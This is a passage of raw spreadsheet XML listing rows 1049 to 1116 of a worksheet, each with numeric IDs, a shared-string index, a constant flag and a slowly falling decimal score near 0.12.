        <v>1.0777091E7</v>
      </c>
      <c r="C1049" s="2" t="s">
        <v>934</v>
      </c>
      <c r="D1049" s="2">
        <v>1.0</v>
      </c>
      <c r="E1049" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1049" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1050" ht="15.75" customHeight="1">
      <c r="A1050" s="1">
        <v>24508.0</v>
      </c>
      <c r="B1050" s="2">
        <v>1.1128328E7</v>
      </c>
      <c r="C1050" s="2" t="s">
        <v>935</v>
      </c>
      <c r="D1050" s="2">
        <v>1.0</v>
      </c>
      <c r="E1050" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1050" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1051" ht="15.75" customHeight="1">
      <c r="A1051" s="1">
        <v>24659.0</v>
      </c>
      <c r="B1051" s="2">
        <v>1.1521815E7</v>
      </c>
      <c r="C1051" s="2" t="s">
        <v>936</v>
      </c>
      <c r="D1051" s="2">
        <v>1.0</v>
      </c>
      <c r="E1051" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1051" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1052" ht="15.75" customHeight="1">
      <c r="A1052" s="1">
        <v>24698.0</v>
      </c>
      <c r="B1052" s="2">
        <v>1.1630585E7</v>
      </c>
      <c r="C1052" s="2" t="s">
        <v>937</v>
      </c>
      <c r="D1052" s="2">
        <v>1.0</v>
      </c>
      <c r="E1052" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1052" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1053" ht="15.75" customHeight="1">
      <c r="A1053" s="1">
        <v>25253.0</v>
      </c>
      <c r="B1053" s="2">
        <v>1.3382816E7</v>
      </c>
      <c r="C1053" s="2" t="s">
        <v>938</v>
      </c>
      <c r="D1053" s="2">
        <v>1.0</v>
      </c>
      <c r="E1053" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1053" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1054" ht="15.75" customHeight="1">
      <c r="A1054" s="1">
        <v>26434.0</v>
      </c>
      <c r="B1054" s="2">
        <v>1.7239587E7</v>
      </c>
      <c r="C1054" s="2" t="s">
        <v>939</v>
      </c>
      <c r="D1054" s="2">
        <v>1.0</v>
      </c>
      <c r="E1054" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1054" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1055" ht="15.75" customHeight="1">
      <c r="A1055" s="1">
        <v>26626.0</v>
      </c>
      <c r="B1055" s="2">
        <v>1.8043106E7</v>
      </c>
      <c r="C1055" s="2" t="s">
        <v>940</v>
      </c>
      <c r="D1055" s="2">
        <v>1.0</v>
      </c>
      <c r="E1055" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1055" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1056" ht="15.75" customHeight="1">
      <c r="A1056" s="1">
        <v>26644.0</v>
      </c>
      <c r="B1056" s="2">
        <v>1.8048644E7</v>
      </c>
      <c r="C1056" s="2" t="s">
        <v>921</v>
      </c>
      <c r="D1056" s="2">
        <v>1.0</v>
      </c>
      <c r="E1056" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1056" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1057" ht="15.75" customHeight="1">
      <c r="A1057" s="1">
        <v>26994.0</v>
      </c>
      <c r="B1057" s="2">
        <v>1.9798869E7</v>
      </c>
      <c r="C1057" s="2" t="s">
        <v>864</v>
      </c>
      <c r="D1057" s="2">
        <v>1.0</v>
      </c>
      <c r="E1057" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1057" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1058" ht="15.75" customHeight="1">
      <c r="A1058" s="1">
        <v>27356.0</v>
      </c>
      <c r="B1058" s="2">
        <v>2.1582856E7</v>
      </c>
      <c r="C1058" s="2" t="s">
        <v>941</v>
      </c>
      <c r="D1058" s="2">
        <v>1.0</v>
      </c>
      <c r="E1058" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1058" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1059" ht="15.75" customHeight="1">
      <c r="A1059" s="1">
        <v>27897.0</v>
      </c>
      <c r="B1059" s="2">
        <v>2.3666187E7</v>
      </c>
      <c r="C1059" s="2" t="s">
        <v>942</v>
      </c>
      <c r="D1059" s="2">
        <v>1.0</v>
      </c>
      <c r="E1059" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1059" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1060" ht="15.75" customHeight="1">
      <c r="A1060" s="1">
        <v>27915.0</v>
      </c>
      <c r="B1060" s="2">
        <v>2.3731786E7</v>
      </c>
      <c r="C1060" s="2" t="s">
        <v>943</v>
      </c>
      <c r="D1060" s="2">
        <v>1.0</v>
      </c>
      <c r="E1060" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1060" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1061" ht="15.75" customHeight="1">
      <c r="A1061" s="1">
        <v>27917.0</v>
      </c>
      <c r="B1061" s="2">
        <v>2.3731786E7</v>
      </c>
      <c r="C1061" s="2" t="s">
        <v>944</v>
      </c>
      <c r="D1061" s="2">
        <v>1.0</v>
      </c>
      <c r="E1061" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1061" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1062" ht="15.75" customHeight="1">
      <c r="A1062" s="1">
        <v>28316.0</v>
      </c>
      <c r="B1062" s="2">
        <v>2.5757745E7</v>
      </c>
      <c r="C1062" s="2" t="s">
        <v>945</v>
      </c>
      <c r="D1062" s="2">
        <v>1.0</v>
      </c>
      <c r="E1062" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1062" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1063" ht="15.75" customHeight="1">
      <c r="A1063" s="1">
        <v>29232.0</v>
      </c>
      <c r="B1063" s="2">
        <v>3.0832667E7</v>
      </c>
      <c r="C1063" s="2" t="s">
        <v>946</v>
      </c>
      <c r="D1063" s="2">
        <v>1.0</v>
      </c>
      <c r="E1063" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1063" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1064" ht="15.75" customHeight="1">
      <c r="A1064" s="1">
        <v>29293.0</v>
      </c>
      <c r="B1064" s="2">
        <v>3.1162646E7</v>
      </c>
      <c r="C1064" s="2" t="s">
        <v>925</v>
      </c>
      <c r="D1064" s="2">
        <v>1.0</v>
      </c>
      <c r="E1064" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1064" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1065" ht="15.75" customHeight="1">
      <c r="A1065" s="1">
        <v>30182.0</v>
      </c>
      <c r="B1065" s="2">
        <v>3.7188338E7</v>
      </c>
      <c r="C1065" s="2" t="s">
        <v>947</v>
      </c>
      <c r="D1065" s="2">
        <v>1.0</v>
      </c>
      <c r="E1065" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1065" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1066" ht="15.75" customHeight="1">
      <c r="A1066" s="1">
        <v>30298.0</v>
      </c>
      <c r="B1066" s="2">
        <v>3.7844136E7</v>
      </c>
      <c r="C1066" s="2" t="s">
        <v>948</v>
      </c>
      <c r="D1066" s="2">
        <v>1.0</v>
      </c>
      <c r="E1066" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1066" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1067" ht="15.75" customHeight="1">
      <c r="A1067" s="1">
        <v>30317.0</v>
      </c>
      <c r="B1067" s="2">
        <v>3.8034178E7</v>
      </c>
      <c r="C1067" s="2" t="s">
        <v>949</v>
      </c>
      <c r="D1067" s="2">
        <v>1.0</v>
      </c>
      <c r="E1067" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1067" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1068" ht="15.75" customHeight="1">
      <c r="A1068" s="1">
        <v>30738.0</v>
      </c>
      <c r="B1068" s="2">
        <v>4.4029816E7</v>
      </c>
      <c r="C1068" s="2" t="s">
        <v>950</v>
      </c>
      <c r="D1068" s="2">
        <v>1.0</v>
      </c>
      <c r="E1068" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1068" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1069" ht="15.75" customHeight="1">
      <c r="A1069" s="1">
        <v>30833.0</v>
      </c>
      <c r="B1069" s="2">
        <v>4550985.0</v>
      </c>
      <c r="C1069" s="2" t="s">
        <v>951</v>
      </c>
      <c r="D1069" s="2">
        <v>1.0</v>
      </c>
      <c r="E1069" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1069" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1070" ht="15.75" customHeight="1">
      <c r="A1070" s="1">
        <v>30896.0</v>
      </c>
      <c r="B1070" s="2">
        <v>4.6643929E7</v>
      </c>
      <c r="C1070" s="2" t="s">
        <v>952</v>
      </c>
      <c r="D1070" s="2">
        <v>1.0</v>
      </c>
      <c r="E1070" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1070" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1071" ht="15.75" customHeight="1">
      <c r="A1071" s="1">
        <v>31246.0</v>
      </c>
      <c r="B1071" s="2">
        <v>4.9331985E7</v>
      </c>
      <c r="C1071" s="2" t="s">
        <v>953</v>
      </c>
      <c r="D1071" s="2">
        <v>1.0</v>
      </c>
      <c r="E1071" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1071" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1072" ht="15.75" customHeight="1">
      <c r="A1072" s="1">
        <v>32554.0</v>
      </c>
      <c r="B1072" s="2">
        <v>5757668.0</v>
      </c>
      <c r="C1072" s="2" t="s">
        <v>954</v>
      </c>
      <c r="D1072" s="2">
        <v>1.0</v>
      </c>
      <c r="E1072" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1072" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1073" ht="15.75" customHeight="1">
      <c r="A1073" s="1">
        <v>32555.0</v>
      </c>
      <c r="B1073" s="2">
        <v>5757668.0</v>
      </c>
      <c r="C1073" s="2" t="s">
        <v>955</v>
      </c>
      <c r="D1073" s="2">
        <v>1.0</v>
      </c>
      <c r="E1073" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1073" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1074" ht="15.75" customHeight="1">
      <c r="A1074" s="1">
        <v>33536.0</v>
      </c>
      <c r="B1074" s="2">
        <v>8148794.0</v>
      </c>
      <c r="C1074" s="2" t="s">
        <v>956</v>
      </c>
      <c r="D1074" s="2">
        <v>1.0</v>
      </c>
      <c r="E1074" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1074" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1075" ht="15.75" customHeight="1">
      <c r="A1075" s="1">
        <v>34112.0</v>
      </c>
      <c r="B1075" s="2">
        <v>9733548.0</v>
      </c>
      <c r="C1075" s="2" t="s">
        <v>957</v>
      </c>
      <c r="D1075" s="2">
        <v>1.0</v>
      </c>
      <c r="E1075" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1075" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1076" ht="15.75" customHeight="1">
      <c r="A1076" s="1">
        <v>2467.0</v>
      </c>
      <c r="B1076" s="2">
        <v>3.3818445E7</v>
      </c>
      <c r="C1076" s="2" t="s">
        <v>958</v>
      </c>
      <c r="D1076" s="2">
        <v>1.0</v>
      </c>
      <c r="E1076" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1076" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="1077" ht="15.75" customHeight="1">
      <c r="A1077" s="1">
        <v>6162.0</v>
      </c>
      <c r="B1077" s="2">
        <v>4.7872694E7</v>
      </c>
      <c r="C1077" s="2" t="s">
        <v>959</v>
      </c>
      <c r="D1077" s="2">
        <v>1.0</v>
      </c>
      <c r="E1077" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1077" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="1078" ht="15.75" customHeight="1">
      <c r="A1078" s="1">
        <v>25691.0</v>
      </c>
      <c r="B1078" s="2">
        <v>1.4524834E7</v>
      </c>
      <c r="C1078" s="2" t="s">
        <v>960</v>
      </c>
      <c r="D1078" s="2">
        <v>1.0</v>
      </c>
      <c r="E1078" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1078" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="1079" ht="15.75" customHeight="1">
      <c r="A1079" s="1">
        <v>26984.0</v>
      </c>
      <c r="B1079" s="2">
        <v>1.9756104E7</v>
      </c>
      <c r="C1079" s="2" t="s">
        <v>961</v>
      </c>
      <c r="D1079" s="2">
        <v>1.0</v>
      </c>
      <c r="E1079" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1079" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="1080" ht="15.75" customHeight="1">
      <c r="A1080" s="1">
        <v>27935.0</v>
      </c>
      <c r="B1080" s="2">
        <v>2.3792888E7</v>
      </c>
      <c r="C1080" s="2" t="s">
        <v>962</v>
      </c>
      <c r="D1080" s="2">
        <v>1.0</v>
      </c>
      <c r="E1080" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1080" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="1081" ht="15.75" customHeight="1">
      <c r="A1081" s="1">
        <v>21782.0</v>
      </c>
      <c r="B1081" s="2">
        <v>2.6486322E7</v>
      </c>
      <c r="C1081" s="2" t="s">
        <v>963</v>
      </c>
      <c r="D1081" s="2">
        <v>1.0</v>
      </c>
      <c r="E1081" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1081" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="1082" ht="15.75" customHeight="1">
      <c r="A1082" s="1">
        <v>32300.0</v>
      </c>
      <c r="B1082" s="2">
        <v>5.5536436E7</v>
      </c>
      <c r="C1082" s="2" t="s">
        <v>964</v>
      </c>
      <c r="D1082" s="2">
        <v>1.0</v>
      </c>
      <c r="E1082" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1082" s="2">
        <v>0.1227709190672154</v>
      </c>
    </row>
    <row r="1083" ht="15.75" customHeight="1">
      <c r="A1083" s="1">
        <v>28878.0</v>
      </c>
      <c r="B1083" s="2">
        <v>2.9170761E7</v>
      </c>
      <c r="C1083" s="2" t="s">
        <v>965</v>
      </c>
      <c r="D1083" s="2">
        <v>1.0</v>
      </c>
      <c r="E1083" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1083" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="1084" ht="15.75" customHeight="1">
      <c r="A1084" s="1">
        <v>32908.0</v>
      </c>
      <c r="B1084" s="2">
        <v>6396210.0</v>
      </c>
      <c r="C1084" s="2" t="s">
        <v>966</v>
      </c>
      <c r="D1084" s="2">
        <v>1.0</v>
      </c>
      <c r="E1084" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1084" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="1085" ht="15.75" customHeight="1">
      <c r="A1085" s="1">
        <v>28060.0</v>
      </c>
      <c r="B1085" s="2">
        <v>2.457424E7</v>
      </c>
      <c r="C1085" s="2" t="s">
        <v>967</v>
      </c>
      <c r="D1085" s="2">
        <v>1.0</v>
      </c>
      <c r="E1085" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1085" s="2">
        <v>0.1226415094339623</v>
      </c>
    </row>
    <row r="1086" ht="15.75" customHeight="1">
      <c r="A1086" s="1">
        <v>31114.0</v>
      </c>
      <c r="B1086" s="2">
        <v>4.8721782E7</v>
      </c>
      <c r="C1086" s="2" t="s">
        <v>872</v>
      </c>
      <c r="D1086" s="2">
        <v>1.0</v>
      </c>
      <c r="E1086" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1086" s="2">
        <v>0.1226415094339623</v>
      </c>
    </row>
    <row r="1087" ht="15.75" customHeight="1">
      <c r="A1087" s="1">
        <v>3588.0</v>
      </c>
      <c r="B1087" s="2">
        <v>3.9034988E7</v>
      </c>
      <c r="C1087" s="2" t="s">
        <v>968</v>
      </c>
      <c r="D1087" s="2">
        <v>1.0</v>
      </c>
      <c r="E1087" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1087" s="2">
        <v>0.1225749559082893</v>
      </c>
    </row>
    <row r="1088" ht="15.75" customHeight="1">
      <c r="A1088" s="1">
        <v>23795.0</v>
      </c>
      <c r="B1088" s="2">
        <v>7749894.0</v>
      </c>
      <c r="C1088" s="2" t="s">
        <v>969</v>
      </c>
      <c r="D1088" s="2">
        <v>1.0</v>
      </c>
      <c r="E1088" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1088" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="1089" ht="15.75" customHeight="1">
      <c r="A1089" s="1">
        <v>28710.0</v>
      </c>
      <c r="B1089" s="2">
        <v>2.7804168E7</v>
      </c>
      <c r="C1089" s="2" t="s">
        <v>970</v>
      </c>
      <c r="D1089" s="2">
        <v>1.0</v>
      </c>
      <c r="E1089" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1089" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="1090" ht="15.75" customHeight="1">
      <c r="A1090" s="1">
        <v>31495.0</v>
      </c>
      <c r="B1090" s="2">
        <v>5062934.0</v>
      </c>
      <c r="C1090" s="2" t="s">
        <v>971</v>
      </c>
      <c r="D1090" s="2">
        <v>1.0</v>
      </c>
      <c r="E1090" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1090" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="1091" ht="15.75" customHeight="1">
      <c r="A1091" s="1">
        <v>31610.0</v>
      </c>
      <c r="B1091" s="2">
        <v>5141596.0</v>
      </c>
      <c r="C1091" s="2" t="s">
        <v>972</v>
      </c>
      <c r="D1091" s="2">
        <v>1.0</v>
      </c>
      <c r="E1091" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1091" s="2">
        <v>0.1223958333333334</v>
      </c>
    </row>
    <row r="1092" ht="15.75" customHeight="1">
      <c r="A1092" s="1">
        <v>15582.0</v>
      </c>
      <c r="B1092" s="2">
        <v>4.3440893E7</v>
      </c>
      <c r="C1092" s="2" t="s">
        <v>973</v>
      </c>
      <c r="D1092" s="2">
        <v>1.0</v>
      </c>
      <c r="E1092" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1092" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="1093" ht="15.75" customHeight="1">
      <c r="A1093" s="1">
        <v>16870.0</v>
      </c>
      <c r="B1093" s="2">
        <v>4.7956305E7</v>
      </c>
      <c r="C1093" s="2" t="s">
        <v>974</v>
      </c>
      <c r="D1093" s="2">
        <v>1.0</v>
      </c>
      <c r="E1093" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1093" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="1094" ht="15.75" customHeight="1">
      <c r="A1094" s="1">
        <v>28459.0</v>
      </c>
      <c r="B1094" s="2">
        <v>2.6609639E7</v>
      </c>
      <c r="C1094" s="2" t="s">
        <v>975</v>
      </c>
      <c r="D1094" s="2">
        <v>1.0</v>
      </c>
      <c r="E1094" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1094" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="1095" ht="15.75" customHeight="1">
      <c r="A1095" s="1">
        <v>20235.0</v>
      </c>
      <c r="B1095" s="2">
        <v>1.0851148E7</v>
      </c>
      <c r="C1095" s="2" t="s">
        <v>976</v>
      </c>
      <c r="D1095" s="2">
        <v>1.0</v>
      </c>
      <c r="E1095" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1095" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="1096" ht="15.75" customHeight="1">
      <c r="A1096" s="1">
        <v>25858.0</v>
      </c>
      <c r="B1096" s="2">
        <v>1.4878802E7</v>
      </c>
      <c r="C1096" s="2" t="s">
        <v>977</v>
      </c>
      <c r="D1096" s="2">
        <v>1.0</v>
      </c>
      <c r="E1096" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1096" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="1097" ht="15.75" customHeight="1">
      <c r="A1097" s="1">
        <v>24666.0</v>
      </c>
      <c r="B1097" s="2">
        <v>1.1547199E7</v>
      </c>
      <c r="C1097" s="2" t="s">
        <v>978</v>
      </c>
      <c r="D1097" s="2">
        <v>1.0</v>
      </c>
      <c r="E1097" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1097" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="1098" ht="15.75" customHeight="1">
      <c r="A1098" s="1">
        <v>27533.0</v>
      </c>
      <c r="B1098" s="2">
        <v>2.2205402E7</v>
      </c>
      <c r="C1098" s="2" t="s">
        <v>979</v>
      </c>
      <c r="D1098" s="2">
        <v>1.0</v>
      </c>
      <c r="E1098" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1098" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="1099" ht="15.75" customHeight="1">
      <c r="A1099" s="1">
        <v>32265.0</v>
      </c>
      <c r="B1099" s="2">
        <v>5.517288E7</v>
      </c>
      <c r="C1099" s="2" t="s">
        <v>980</v>
      </c>
      <c r="D1099" s="2">
        <v>1.0</v>
      </c>
      <c r="E1099" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1099" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="1100" ht="15.75" customHeight="1">
      <c r="A1100" s="1">
        <v>30179.0</v>
      </c>
      <c r="B1100" s="2">
        <v>3716326.0</v>
      </c>
      <c r="C1100" s="2" t="s">
        <v>981</v>
      </c>
      <c r="D1100" s="2">
        <v>1.0</v>
      </c>
      <c r="E1100" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1100" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="1101" ht="15.75" customHeight="1">
      <c r="A1101" s="1">
        <v>31878.0</v>
      </c>
      <c r="B1101" s="2">
        <v>5.2866709E7</v>
      </c>
      <c r="C1101" s="2" t="s">
        <v>982</v>
      </c>
      <c r="D1101" s="2">
        <v>1.0</v>
      </c>
      <c r="E1101" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1101" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="1102" ht="15.75" customHeight="1">
      <c r="A1102" s="1">
        <v>565.0</v>
      </c>
      <c r="B1102" s="2">
        <v>1.8994258E7</v>
      </c>
      <c r="C1102" s="2" t="s">
        <v>983</v>
      </c>
      <c r="D1102" s="2">
        <v>1.0</v>
      </c>
      <c r="E1102" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1102" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="1103" ht="15.75" customHeight="1">
      <c r="A1103" s="1">
        <v>16830.0</v>
      </c>
      <c r="B1103" s="2">
        <v>4.788373E7</v>
      </c>
      <c r="C1103" s="2" t="s">
        <v>984</v>
      </c>
      <c r="D1103" s="2">
        <v>1.0</v>
      </c>
      <c r="E1103" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1103" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="1104" ht="15.75" customHeight="1">
      <c r="A1104" s="1">
        <v>24577.0</v>
      </c>
      <c r="B1104" s="2">
        <v>1.1327063E7</v>
      </c>
      <c r="C1104" s="2" t="s">
        <v>985</v>
      </c>
      <c r="D1104" s="2">
        <v>1.0</v>
      </c>
      <c r="E1104" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1104" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="1105" ht="15.75" customHeight="1">
      <c r="A1105" s="1">
        <v>1340.0</v>
      </c>
      <c r="B1105" s="2">
        <v>2.5864806E7</v>
      </c>
      <c r="C1105" s="2" t="s">
        <v>986</v>
      </c>
      <c r="D1105" s="2">
        <v>1.0</v>
      </c>
      <c r="E1105" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1105" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="1106" ht="15.75" customHeight="1">
      <c r="A1106" s="1">
        <v>4702.0</v>
      </c>
      <c r="B1106" s="2">
        <v>4.3251682E7</v>
      </c>
      <c r="C1106" s="2" t="s">
        <v>987</v>
      </c>
      <c r="D1106" s="2">
        <v>1.0</v>
      </c>
      <c r="E1106" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1106" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="1107" ht="15.75" customHeight="1">
      <c r="A1107" s="1">
        <v>23077.0</v>
      </c>
      <c r="B1107" s="2">
        <v>5.0521496E7</v>
      </c>
      <c r="C1107" s="2" t="s">
        <v>988</v>
      </c>
      <c r="D1107" s="2">
        <v>1.0</v>
      </c>
      <c r="E1107" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1107" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="1108" ht="15.75" customHeight="1">
      <c r="A1108" s="1">
        <v>25285.0</v>
      </c>
      <c r="B1108" s="2">
        <v>1.3399403E7</v>
      </c>
      <c r="C1108" s="2" t="s">
        <v>989</v>
      </c>
      <c r="D1108" s="2">
        <v>1.0</v>
      </c>
      <c r="E1108" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1108" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="1109" ht="15.75" customHeight="1">
      <c r="A1109" s="1">
        <v>17873.0</v>
      </c>
      <c r="B1109" s="2">
        <v>5.1027859E7</v>
      </c>
      <c r="C1109" s="2" t="s">
        <v>990</v>
      </c>
      <c r="D1109" s="2">
        <v>1.0</v>
      </c>
      <c r="E1109" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1109" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="1110" ht="15.75" customHeight="1">
      <c r="A1110" s="1">
        <v>27818.0</v>
      </c>
      <c r="B1110" s="2">
        <v>2.3365037E7</v>
      </c>
      <c r="C1110" s="2" t="s">
        <v>991</v>
      </c>
      <c r="D1110" s="2">
        <v>1.0</v>
      </c>
      <c r="E1110" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1110" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="1111" ht="15.75" customHeight="1">
      <c r="A1111" s="1">
        <v>4799.0</v>
      </c>
      <c r="B1111" s="2">
        <v>4.3512056E7</v>
      </c>
      <c r="C1111" s="2" t="s">
        <v>992</v>
      </c>
      <c r="D1111" s="2">
        <v>1.0</v>
      </c>
      <c r="E1111" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1111" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1112" ht="15.75" customHeight="1">
      <c r="A1112" s="1">
        <v>9347.0</v>
      </c>
      <c r="B1112" s="2">
        <v>5.5661894E7</v>
      </c>
      <c r="C1112" s="2" t="s">
        <v>993</v>
      </c>
      <c r="D1112" s="2">
        <v>1.0</v>
      </c>
      <c r="E1112" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1112" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1113" ht="15.75" customHeight="1">
      <c r="A1113" s="1">
        <v>11699.0</v>
      </c>
      <c r="B1113" s="2">
        <v>2.3482255E7</v>
      </c>
      <c r="C1113" s="2" t="s">
        <v>994</v>
      </c>
      <c r="D1113" s="2">
        <v>1.0</v>
      </c>
      <c r="E1113" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1113" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1114" ht="15.75" customHeight="1">
      <c r="A1114" s="1">
        <v>13056.0</v>
      </c>
      <c r="B1114" s="2">
        <v>3.3214892E7</v>
      </c>
      <c r="C1114" s="2" t="s">
        <v>995</v>
      </c>
      <c r="D1114" s="2">
        <v>1.0</v>
      </c>
      <c r="E1114" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1114" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1115" ht="15.75" customHeight="1">
      <c r="A1115" s="1">
        <v>13375.0</v>
      </c>
      <c r="B1115" s="2">
        <v>3.4855006E7</v>
      </c>
      <c r="C1115" s="2" t="s">
        <v>996</v>
      </c>
      <c r="D1115" s="2">
        <v>1.0</v>
      </c>
      <c r="E1115" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1115" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="1116" ht="15.75" customHeight="1">
      <c r="A1116" s="1">
        <v>17510.0</v>
      </c>
      <c r="B1116" s="2">
        <v>5.0014243E7</v>
      </c>
      <c r="C1116" s="2" t="s">
        <v>997</v>
      </c>
      <c r="D1116" s="2">
        <v>1.0</v>
      </c>
      <c r="E1116" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1116" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
